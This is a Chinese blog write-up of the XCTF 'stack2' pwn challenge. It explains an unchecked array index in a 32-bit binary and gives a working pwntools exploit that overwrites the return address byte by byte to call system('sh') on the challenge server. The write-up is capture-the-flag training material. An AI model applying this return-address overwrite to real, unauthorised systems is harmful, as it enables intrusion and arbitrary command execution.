XCTF pwn stack2

已于 2024-05-21 23:43:03 修改
阅读量486 收藏 10
点赞数 14
分类专栏: pwn 文章标签: linux python
于 2024-05-21 21:20:30 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zwb2603096342/article/details/139101902
版权

a071f54e0cf84ed48b38526a5581e1be.bmp

checksec 文件看一下保护

 c6c715114b7148a68170f77205a7e3f6.bmp

32位,开了NX和canary,用ida看一下反汇编代码 

直接看关键的地方

8217dfdd2af04b99afcee586435ce707.bmp 

由于没有检查数组的边界,于是在这里可以做到覆盖任意地址,那么想法就是覆盖eip的地址到backdoor,发现ida有一处hackhere,跟踪看看

f64ae8ccab5b40a2a7ed74401f8e362e.bmp

发现是/bin/bash,而不是/bin/sh,于是需要自己构建system("sh"),于是开始实操,先找到eip距离ebp的位置

91a98414dfb54ebebe3f5279a04af4d9.bmp 

虽然v13距离ebp是0x70,但是eip的位置并不是0x70+4,而是0x84,可以看main函数的栈结构,也可以ida调试,这里是借鉴的别人的wp,后续有时间补上调试过程。

那么知道要写入的位置是v13[0x84]了,那么如何写入呢,由于这里是char类型的数组写入,char每个元素是一字节,于是采取逐字节写入。 

system的地址采取system_plt的地址,可以直接在ida里面找,这里就不上图片了,sh的地址如何获得呢?看图片

1897bfb914cf452f956e40591116da2a.bmp

对上面图片这部分按下d,便可以出现 下面的情况

518f24c9dd5a4df6aa2b947d37cf038f.bmp

于是便获得了sh的地址,0x08048987

好了,准备活动都做完了,直接上脚本

from pwn import *
context(arch='i386',log_level='debug')
p = remote("61.147.171.105",59092)

#注意小端序
sh = [ 0x87,0x89,0x04,0x08]#sh = 0x08048987
system = [ 0x50,0x84,0x04,0x08 ] #system = 0x08048450
padding = 0x84 #eip离ebp距离

def change(write_add,write_in):
    p.sendlineafter("5. exit\n",'3')
    p.sendlineafter("change:\n",str(write_add))
    p.sendlineafter("new number:\n",str(write_in))
    
p.sendlineafter("How many numbers you have:\n",str(1))
p.sendlineafter("Give me your numbers\n",str(1))

#p.recvuntil("5. exit\n")

for i in range(4):
    change(padding+i,system[i])

padding += 8 #写入了4字节 + 传参间隔一个内存单元

for i in range(4):
    change(padding+i,sh[i])

p.sendlineafter("5. exit",'5')
p.interactive()

 

好了,更加详细的wp可以看 stack2 [XCTF-PWN][高手进阶区]CTF writeup攻防世界题解系列15_stack题目ctf-CSDN博客

写的时候也有参考这位师傅的 

 

 

蒟蒻zwb
关注
  • 14
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
XCTF 4th-QCTF-2018 pwn stack2 writeup
qq_39596232的博客
08-30 847
题目描述: 暂无 分析思路: 1、首先拿到ELF文件,我们首先查看一下详细信息: tucker@ubuntu:~/pwn$ file stack2 stack2: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-, for GNU/Linux...
XCTF-mobile app2
01-03
app2-安卓逆向1.提取文件2.分析文件3.分析XML文件4.经过验证得到flag5.其他解法 下载地址:点此下载 1.提取文件 更改app安装包后缀为zip 把这3个文件解压出来 然后使用dex2jar将dex文件转换为jar文件,得到一个jar...
XCTF-pwn-stack2 - Writeup
菜小狗.的博客
11-28 536
偶尔在学习的阶段慢慢发现的进步 抽空写点笔记记录一下子 这次做的题目还是栈溢出漏洞的题目但是并没用用到payload,简单用了下ROP 题目描述 除了一个名称 stack2 题目描述是:暂无 下载附件运行一下看看流程 保护开启了nx 和canary 流程大概是提供了4个选项的功能:加数、改数还有求平均数啥的。 然后丢到iad里看一下这部分的流程简单分析一下漏洞点。 在这里看还是蛮正常的,...
xctf-pwn-“stack2 & pwn1 & welpwn
njh18790816639的博客
07-30 181
stack2 首先探测一番,是32位,看下保护! ida静态分析一番! 还有个后门函数: 原先先要使用这个后门函数,但是发现远程服务器是没有bash的,所以这个后门函数是没有用的,误导我等! 不过还是先按正常思路来说,这第三个函数是没有检查数据的合法性的。 ...
[XCTF-pwn] 6-stack2
weixin_52640415的博客
03-03 100
每次允许在指写偏移写1个字节。 32没开pie且有system,bin/dash直接把 system+ret+bin/sh写到返回地址处即可 from pwn import * local = 0 if local == 1: p = process('./pwn') else: p = remote('111.200.241.244', 56810) elf = ELF('./pwn') context(arch='i386', log_level='debug') p.sen
xctf pwn高手进阶题之stack2
neuisf的博客
01-25 304
程序读取一个数字n,然后根据数字n读取数字到缓冲区,在执行需修改操作时为判断是否越界,而是根据用户输入的数字进行修改,造成堆栈地址内容修改。只需修改返回值即可。此题提供了hackhere函数输出flag,本地执行正常,远程出错,提示找不到/bin/bash。此处,技巧是执行system(’sh’)代替system(’/bin/sh’)。 exp: from pwn import * p=remot...
XCTF pwn1 babystack
zwb2603096342的博客
05-22 490
攻防世界 pwn1 babystack canary的泄露和onegadget的泄露
level2 [XCTF-PWN]CTF writeup系列6
重新启程
12-19 545
题目地址:level2 先看看题目内容: 照例下载文件,检查一下保护机制 root@mypwn:/ctf/work/python# checksec 15bc0349874045ba84bb6e504e910a46 [*] '/ctf/work/python/15bc0349874045ba84bb6e504e910a46' Arch: i386-32-little ...
攻防世界pwn——stack2
qq_62076255的博客
12-18 572
攻防世界pwn——stack2做题记录
XCTF PWN level3
qq_41743240的博客
04-14 381
检查一下保护机制 开了NX,不能执行shellcode,首先选择ROP方式获取shell 通过IDA反编译调试, 发现在vulnerable_function函数这里存在溢出漏洞 查询一下有没有可利用函数 无system和/bin/sh 本题可以有两种解题思路 思路一 根据题目给出的libc泄露system和/bin/sh 该如何泄露呢? 这里有一个公式: libc函数 = 程序函数 ...
XCTF mfc逆向-200
12-22
查壳 vmp。。。 看了大佬博客后得知解法 这是一个MFC程序,但我不会。。。...但是我知道mfc的程序应该都是一个个控件组成 ...发现这两个东西,第一个是窗口类名,第二个我也不晓得是啥,但是它比前面和后面的少了一个消息...
圣徒xctf网站
02-14
圣徒xctf网站概述SaintsXCTF Web应用程序的前端。 这是SaintsXCTF Web应用程序的第二个版本。 前端使用React.js编写,并使用Sass进行样式设置。 API调用通过Nginx代理路由到 。指令在本地启动应用程序首次设置应该...
XMan-MISC-诸葛建伟XCTF-public.pdf
12-04
MISC,中文即杂项,包括隐写,数据还原,脑洞、社会工程、与信息安全相关的大数据等。 竞赛过程中解MISC时会涉及到各种脑洞,各种花式技巧,主要考察选手的快速理解、学习能力以及日常知识积累的广度、深度。...
【Linux】Xshell和Xftp简介_安装_VMware虚拟机使用
最新发布
wosixiaokeai的博客
06-19 763
Xftp是一个功能强大的SFTP、FTP文件传输软件,它允许MS Windows用户安全地在UNIX/Linux和Windows PC之间传输文件。Xftp支持SFTP协议,确保所有通过该软件的网络流量都是加密的。它采用了标准的Windows风格的向导,用户界面直观易用,可以很好地与其他Windows应用程序协同工作。Xftp的特色功能包括同步功能、直接编辑远程文件、多窗格支持、文件交换协议(FXP)支持等,这些功能使得文件传输更加容易和快捷。
解决 Linux 和 Java 1.8 中上传中文名称图片报错问题
appearappear的博客
06-12 376
在 Linux 系统和 Java 1.8 中,当尝试上传含有中文名称的图片时,可能会遇到以下错误提示:为了解决这个问题,可以采取以下方法:在 Docker 的 中添加如下参数:Dockerfile使用以下命令启动 Java 程序,添加 参数:通过以上配置,确保了在启动 Java 程序时,使用了 UTF-8 编码,这样可以正确处理含有中文名称的文件,避免了报错问题的发生。3.5
Linux实时查看Java接口数据
m0_72958694的博客
06-19 669
本文详细介绍了如何在Linux环境中结合Java Spring Boot应用程序和Python脚本来实时(或定期)查看Java接口的数据。
linux中: IDEA 由于JVM 设置内存过小,导致打开项目闪退问题
m0_72560900的博客
06-12 533
在linux(debian/ubuntu)中idea的插件默认安装位置和配置文件在哪里?
Linux 6.10也引进了蓝屏机制
bugsycrack的博客
06-19 76
Linux 6.10 还在开发之中,最新版本是 rc4,扩展 DRM Panic 支持的工作还在进行之中。未来在运行 Linux 6.10+ 的平台上,如果驱动支持 DRM Panic,那么就可以通过 echo c > /proc/sysrq-trigger 测试 Linux 版本的“蓝屏死机(BSOD)”。Linux 6.10 引入了一个新的 DRM Panic 处理程序基础设施,以便于在致命错误(Panic)发生时显示相关信息。
xctf supersqli
09-01
对于 xctf supersqli,它是一个供参与者练习 SQL 注入技巧的 CTF(Capture The Flag)比赛题目。CTF比赛是一种网络安全竞赛,旨在测试参与者在各种安全领域的技能。在 xctf supersqli 中,参与者需要利用 SQL 注入...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值